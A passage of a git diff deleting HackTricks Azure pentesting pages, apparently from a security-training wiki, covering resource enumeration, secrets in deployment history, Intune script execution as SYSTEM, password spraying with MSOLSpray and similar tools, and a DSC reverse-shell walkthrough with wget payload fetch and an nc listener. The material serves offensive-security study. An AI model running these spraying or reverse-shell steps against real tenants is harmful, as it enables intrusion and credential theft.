- -1. After the user has accessed the application through an endpoint, the user is directed to the **Azure AD sign-in page**. -2. After a **successful sign-in**, Azure AD sends a **token** to the user's client device. -3. The client sends the token to the **Application Proxy service**, which retrieves the user principal name (UPN) and security principal name (SPN) from the token. **Application Proxy then sends the request to the Application Proxy connector**. -4. If you have configured single sign-on, the connector performs any **additional authentication** required on behalf of the user. -5. The connector sends the request to the **on-premises application**. -6. The **response** is sent through the connector and Application Proxy service **to the user**. - -## Enumeration - -```powershell -# Enumerate applications with application proxy configured -Get-AzureADApplication | %{try{Get-AzureADApplicationProxyApplication -ObjectId $_.ObjectID;$_.DisplayName;$_.ObjectID}catch{}} - -# Get applications service principal -Get-AzureADServicePrincipal -All $true | ?{$_.DisplayName -eq "Name"} - -# Use the following ps1 script from https://learn.microsoft.com/en-us/azure/active-directory/app-proxy/scripts/powershell-display-users-group-of-app -# to find users and groups assigned to the application. Pass the ObjectID of the Service Principal to it -Get-ApplicationProxyAssignedUsersAndGroups -ObjectId -``` - -## References - -* [https://learn.microsoft.com/en-us/azure/active-directory/app-proxy/application-proxy](https://learn.microsoft.com/en-us/azure/active-directory/app-proxy/application-proxy) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-services/az-arm-templates.md b/pentesting-cloud/azure-security/az-services/az-arm-templates.md
deleted file mode 100644
index b594c6aa7..000000000
--- a/pentesting-cloud/azure-security/az-services/az-arm-templates.md
+++ /dev/null
@@ -1,57 +0,0 @@
-# Az - ARM Templates / Deployments
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## Basic Information - -[From the docs:](https://learn.microsoft.com/en-us/azure/azure-resource-manager/templates/overview) To implement **infrastructure as code for your Azure solutions**, use Azure Resource Manager templates (ARM templates). The template is a JavaScript Object Notation (**JSON**) file that **defines** the **infrastructure** and configuration for your project. The template uses declarative syntax, which lets you state what you intend to deploy without having to write the sequence of programming commands to create it. In the template, you specify the resources to deploy and the properties for those resources. - -### History - -If you can access it, you can have **info about resources** that are not present but might be deployed in the future. Moreover, if a **parameter** containing **sensitive info** was marked as "**String**" **instead** of "**SecureString**", it will be present in **clear-text**. - -## Search Sensitive Info - -Users with the permissions `Microsoft.Resources/deployments/read` and `Microsoft.Resources/subscriptions/resourceGroups/read` can **read the deployment history**. - -```powershell -Get-AzResourceGroup -Get-AzResourceGroupDeployment -ResourceGroupName - -# Export -Save-AzResourceGroupDeploymentTemplate -ResourceGroupName -DeploymentName -cat .json # search for hardcoded password -cat | Select-String password -``` - -## References - -* [https://app.gitbook.com/s/5uvPQhxNCPYYTqpRwsuS/\~/changes/argKsv1NUBY9l4Pd28TU/pentesting-cloud/azure-security/az-services/az-arm-templates#references](az-arm-templates.md#references) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-services/az-automation-account/az-state-configuration-rce.md b/pentesting-cloud/azure-security/az-services/az-automation-account/az-state-configuration-rce.md
deleted file mode 100644
index 5f6a84345..000000000
--- a/pentesting-cloud/azure-security/az-services/az-automation-account/az-state-configuration-rce.md
+++ /dev/null
@@ -1,91 +0,0 @@
-# Az - State Configuration RCE
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -**Check the complete post in:** [**https://medium.com/cepheisecurity/abusing-azure-dsc-remote-code-execution-and-privilege-escalation-ab8c35dd04fe**](https://medium.com/cepheisecurity/abusing-azure-dsc-remote-code-execution-and-privilege-escalation-ab8c35dd04fe) - -### Summary of Remote Server (C2) Infrastructure Preparation and Steps - -#### Overview - -The process involves setting up a remote server infrastructure to host a modified Nishang `Invoke-PowerShellTcp.ps1` payload, named `RevPS.ps1`, designed to bypass Windows Defender. The payload is served from a Kali Linux machine with IP `40.84.7.74` using a simple Python HTTP server. The operation is executed through several steps: - -#### Step 1 — Create Files - -* **Files Required:** Two PowerShell scripts are needed: - 1. `reverse_shell_config.ps1`: A Desired State Configuration (DSC) file that fetches and executes the payload. It is obtainable from [GitHub](https://github.com/nickpupp0/AzureDSCAbuse/blob/master/reverse_shell_config.ps1). - 2. `push_reverse_shell_config.ps1`: A script to publish the configuration to the VM, available at [GitHub](https://github.com/nickpupp0/AzureDSCAbuse/blob/master/push_reverse_shell_config.ps1). -* **Customization:** Variables and parameters in these files must be tailored to the user's specific environment, including resource names, file paths, and server/payload identifiers. - -#### Step 2 — Zip Configuration File - -* The `reverse_shell_config.ps1` is compressed into a `.zip` file, making it ready for transfer to the Azure Storage Account. - -```powershell -Compress-Archive -Path .\reverse_shell_config.ps1 -DestinationPath .\reverse_shell_config.ps1.zip -``` - -#### Step 3 — Set Storage Context & Upload - -* The zipped configuration file is uploaded to a predefined Azure Storage container, azure-pentest, using Azure's Set-AzStorageBlobContent cmdlet. 
- -```powershell -Set-AzStorageBlobContent -File "reverse_shell_config.ps1.zip" -Container "azure-pentest" -Blob "reverse_shell_config.ps1.zip" -Context $ctx -``` - -#### Step 4 — Prep Kali Box - -* The Kali server downloads the RevPS.ps1 payload from a GitHub repository. - -```bash -wget https://raw.githubusercontent.com/nickpupp0/AzureDSCAbuse/master/RevPS.ps1 -``` - -* The script is edited to specify the target Windows VM and port for the reverse shell. - -#### Step 5 — Publish Configuration File - -* The configuration file is executed, resulting in the reverse-shell script being deployed to the specified location on the Windows VM. - -#### Step 6 — Host Payload and Setup Listener - -* A Python SimpleHTTPServer is started to host the payload, along with a Netcat listener to capture incoming connections. - -```bash -sudo python -m SimpleHTTPServer 80 -sudo nc -nlvp 443 -``` - -* The scheduled task executes the payload, achieving SYSTEM-level privileges. - -#### Conclusion - -The successful execution of this process opens numerous possibilities for further actions, such as credential dumping or expanding the attack to multiple VMs. The guide encourages continued learning and creativity in the realm of Azure Automation DSC. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.md b/pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.md
deleted file mode 100644
index b2479b6bc..000000000
--- a/pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.md
+++ /dev/null
@@ -1,86 +0,0 @@
-# Az - Management Groups, Subscriptions & Resource Groups
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## Management Groups - -You can find more info about Management Groups in: - -{% content-ref url="../az-basic-information/" %} -[az-basic-information](../az-basic-information/) -{% endcontent-ref %} - -### Enumeration - -```bash -# List -az account management-group list -# Get details and management groups and subscriptions that are children -az account management-group show --name --expand --recurse -``` - -## Subscriptions - -You can find more info about Subscriptions in: - -{% content-ref url="../az-basic-information/" %} -[az-basic-information](../az-basic-information/) -{% endcontent-ref %} - -### Enumeration - -{% code overflow="wrap" %} -```bash -# List all subscriptions -az account list --output table -# Get details -az account management-group subscription show --name --subscription -``` -{% endcode %} - -## Resource Groups - -You can find more info about Resource Groups in: - -{% content-ref url="../az-basic-information/" %} -[az-basic-information](../az-basic-information/) -{% endcontent-ref %} - -### Enumeration - -{% code overflow="wrap" %} -```bash -# List all resource groups -az group list -# Get resource groups of specific subscription -az group list --subscription "" --output table -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-services/az-queue-enum.md b/pentesting-cloud/azure-security/az-services/az-queue-enum.md
deleted file mode 100644
index 03b3918bc..000000000
--- a/pentesting-cloud/azure-security/az-services/az-queue-enum.md
+++ /dev/null
@@ -1,117 +0,0 @@
-# Az - Queue Storage
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## Basic Information - -Azure Queue Storage is a service in Microsoft's Azure cloud platform designed for message queuing between application components, **enabling asynchronous communication and decoupling**. It allows you to store an unlimited number of messages, each up to 64 KB in size, and supports operations such as creating and deleting queues, adding, retrieving, updating, and deleting messages, as well as managing metadata and access policies. While it typically processes messages in a first-in-first-out (FIFO) manner, strict FIFO is not guaranteed. - -### Enumeration - -{% tabs %} -{% tab title="Az Cli" %} -```bash -# You need to know the --account-name of the storage (az storage account list) -az storage queue list --account-name - -# Queue Metadata -az storage queue metadata show --name --account-name - -#Get ACL -az storage queue policy list --queue-name --account-name - -# Get Messages (getting a message deletes it) -az storage message get --queue-name --account-name - -# Peek Messages -az storage message peek --queue-name --account-name -``` -{% endtab %} - -{% tab title="Az PS" %} -```bash -# Get the Storage Context -$storageAccount = Get-AzStorageAccount -ResourceGroupName QueueResourceGroup -Name queuestorageaccount1994 -$ctx = $storageAccount.Context - -# Set Variables for Storage Account -$storageAccountName = "queuestorageaccount" - -# List Queues -Get-AzStorageQueue -Context $context -$queueName = "myqueue" - -# Retrieve a specific queue -$queue = Get-AzStorageQueue -Name $queueName -Context $context -$queue # Show the properties of the queue - -# Retrieve the access policies for the queue -$accessPolicies = Get-AzStorageQueueStoredAccessPolicy -Context $context -QueueName $queueName -$accessPolicies - -# Peek Messages -$queueMessage = $queue.QueueClient.PeekMessage() -$queueMessage.Value - -# Set the amount of time you want to entry to be invisible after read from the queue -# If it is not deleted by the end of this time, it 
will show up in the queue again -$visibilityTimeout = [System.TimeSpan]::FromSeconds(10) - -# Read the messages from the queue, then show the contents of the messages. -$queueMessage = $queue.QueueClient.ReceiveMessages(1,$visibilityTimeout) -$queueMessage.Value -``` -{% endtab %} -{% endtabs %} - -### Privilege Escalation - -{% content-ref url="../az-privilege-escalation/az-queue-privesc.md" %} -[az-queue-privesc.md](../az-privilege-escalation/az-queue-privesc.md) -{% endcontent-ref %} - -### Post Exploitation - -{% content-ref url="../az-post-exploitation/az-queue-post-exploitation.md" %} -[az-queue-post-exploitation.md](../az-post-exploitation/az-queue-post-exploitation.md) -{% endcontent-ref %} - -### Persistence - -{% content-ref url="../az-persistence/az-queue-persistance.md" %} -[az-queue-persistance.md](../az-persistence/az-queue-persistance.md) -{% endcontent-ref %} - -## References - -* https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues -* https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api -* https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-services/az-table-storage.md b/pentesting-cloud/azure-security/az-services/az-table-storage.md
deleted file mode 100644
index 1b7b3e923..000000000
--- a/pentesting-cloud/azure-security/az-services/az-table-storage.md
+++ /dev/null
@@ -1,137 +0,0 @@
-# Az - Table Storage
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Basic Information
-
-**Azure Table Storage** is a NoSQL key-value store designed for storing large volumes of structured, non-relational data. It offers high availability, low latency, and scalability to handle large datasets efficiently. Data is organized into tables, with each entity identified by a partition key and row key, enabling fast lookups. It supports features like encryption at rest, role-based access control, and shared access signatures for secure, managed storage suitable for a wide range of applications.
-
-There **isn't built-in backup mechanism** for table storage.
-
-### Keys
-
-#### **PartitionKey**
-
-* The **PartitionKey groups entities into logical partitions**. Entities with the same PartitionKey are stored together, which improves query performance and scalability.
-* Example: In a table storing employee data, `PartitionKey` might represent a department, e.g., `"HR"` or `"IT"`.
-
-#### **RowKey**
-
-* The **RowKey is the unique identifier** for an entity within a partition. When combined with the PartitionKey, it ensures that each entity in the table has a globally unique identifier.
-* Example: For the `"HR"` partition, `RowKey` might be an employee ID, e.g., `"12345"`.
-
-#### **Other Properties (Custom Properties)**
-
-* Besides the PartitionKey and RowKey, an entity can have additional **custom properties to store data**. These are user-defined and act like columns in a traditional database.
-* Properties are stored as **key-value pairs**.
-* Example: `Name`, `Age`, `Title` could be custom properties for an employee.
-
-## Enumeration
-
-{% tabs %}
-{% tab title="az cli" %}
-{% code overflow="wrap" %}
-```bash
-# Get storage accounts
-az storage account list
-
-# List tables
-az storage table list --account-name
-
-# Read table
-az storage entity query \
- --account-name \
- --table-name \
- --top 10
-
-# Write table
-az storage entity insert \
- --account-name \
- --table-name \
- --entity PartitionKey= RowKey= =
-
-# Write example
-az storage entity insert \
- --account-name mystorageaccount \
- --table-name mytable \
- --entity PartitionKey=HR RowKey=12345 Name="John Doe" Age=30 Title="Manager"
-
-# Update row
-az storage entity merge \
- --account-name mystorageaccount \
- --table-name mytable \
- --entity PartitionKey=pk1 RowKey=rk1 Age=31
-```
-{% endcode %}
-{% endtab %}
-{% tab title="PowerShell" %}
-{% code overflow="wrap" %}
-```powershell
-# Get storage accounts
-Get-AzStorageAccount
-
-# List tables
-Get-AzStorageTable -Context (Get-AzStorageAccount -Name -ResourceGroupName ).Context
-```
-{% endcode %}
-{% endtab %}
-{% endtabs %}
-
-{% hint style="info" %}
-By default `az` cli will use an account key to sign a key and perform the action. To use the Entra ID principal privileges use the parameters `--auth-mode login`.
-{% endhint %}
-
-{% hint style="success" %}
-Use the param `--account-key` to indicate the account key to use\
-Use the param `--sas-token` with the SAS token to access via a SAS token
-{% endhint %}
-
-## Privilege Escalation
-
-Same as storage privesc:
-
-{% content-ref url="../az-privilege-escalation/az-storage-privesc.md" %}
-[az-storage-privesc.md](../az-privilege-escalation/az-storage-privesc.md)
-{% endcontent-ref %}
-
-## Post Exploitation
-
-{% content-ref url="../az-post-exploitation/az-table-storage-post-exploitation.md" %}
-[az-table-storage-post-exploitation.md](../az-post-exploitation/az-table-storage-post-exploitation.md)
-{% endcontent-ref %}
-
-## Persistence
-
-Same as storage persistence:
-
-{% content-ref url="../az-persistence/az-storage-persistence.md" %}
-[az-storage-persistence.md](../az-persistence/az-storage-persistence.md)
-{% endcontent-ref %}
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-services/intune.md b/pentesting-cloud/azure-security/az-services/intune.md
deleted file mode 100644
index 1c5274e15..000000000
--- a/pentesting-cloud/azure-security/az-services/intune.md
+++ /dev/null
@@ -1,57 +0,0 @@
-# Az - Intune
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Basic Information
-
-Microsoft Intune is designed to streamline the process of **app and device management**. Its capabilities extend across a diverse range of devices, encompassing mobile devices, desktop computers, and virtual endpoints. The core functionality of Intune revolves around **managing user access and simplifying the administration of applications** and devices within an organization's network.
-
-## Cloud -> On-Prem
-
-A user with **Global Administrator** or **Intune Administrator** role can execute **PowerShell** scripts on any **enrolled Windows** device.\
-The **script** runs with **privileges** of **SYSTEM** on the device only once if it doesn't change, and from Intune it's **not possible to see the output** of the script.
-
-```powershell
-Get-AzureADGroup -Filter "DisplayName eq 'Intune Administrators'"
-```
-
-1. Login into [https://endpoint.microsoft.com/#home](https://endpoint.microsoft.com/#home) or use Pass-The-PRT
-2. Go to **Devices** -> **All Devices** to check devices enrolled to Intune
-3. Go to **Scripts** and click on **Add** for Windows 10.
-4. Add a **Powershell script**
- * ![](<../../../.gitbook/assets/image (264).png>)
-5. Specify **Add all users** and **Add all devices** in the **Assignments** page.
-
-The execution of the script can take up to **one hour**.
-
-## References
-
-* [https://learn.microsoft.com/en-us/mem/intune/fundamentals/what-is-intune](https://learn.microsoft.com/en-us/mem/intune/fundamentals/what-is-intune)
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md b/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md
deleted file mode 100644
index b48b2dcea..000000000
--- a/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md
+++ /dev/null
@@ -1,33 +0,0 @@
-# Az - Device Code Authentication Phishing
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-**Check:** [**https://o365blog.com/post/phishing/**](https://o365blog.com/post/phishing/)
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.md b/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.md
deleted file mode 100644
index 2ffc070e9..000000000
--- a/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.md
+++ /dev/null
@@ -1,61 +0,0 @@
-# Az - Password Spraying
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Password Spray
-
-In **Azure** this can be done against **different API endpoints** like Azure AD Graph, Microsoft Graph, Office 365 Reporting webservice, etc.
-
-However, note that this technique is **very noisy** and Blue Team can **easily catch it**. Moreover, **forced password complexity** and the use of **MFA** can make this technique kind of useless.
-
-You can perform a password spray attack with [**MSOLSpray**](https://github.com/dafthack/MSOLSpray)
-
-```powershell
-. .\MSOLSpray\MSOLSpray.ps1
-Invoke-MSOLSpray -UserList .\validemails.txt -Password Welcome2022! -Verbose
-```
-
-Or with [**o365spray**](https://github.com/0xZDH/o365spray)
-
-```bash
-python3 o365spray.py --spray -U validemails.txt -p 'Welcome2022!' --count 1 --lockout 1 --domain victim.com
-```
-
-Or with [**MailSniper**](https://github.com/dafthack/MailSniper)
-
-```powershell
-#OWA
-Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile owa-sprayed-creds.txt
-#EWS
-Invoke-PasswordSprayEWS -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile sprayed-ews-creds.txt
-#Gmail
-Invoke-PasswordSprayGmail -UserList .\userlist.txt -Password Fall2016 -Threads 15 -OutFile gmail-sprayed-creds.txt
-```
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
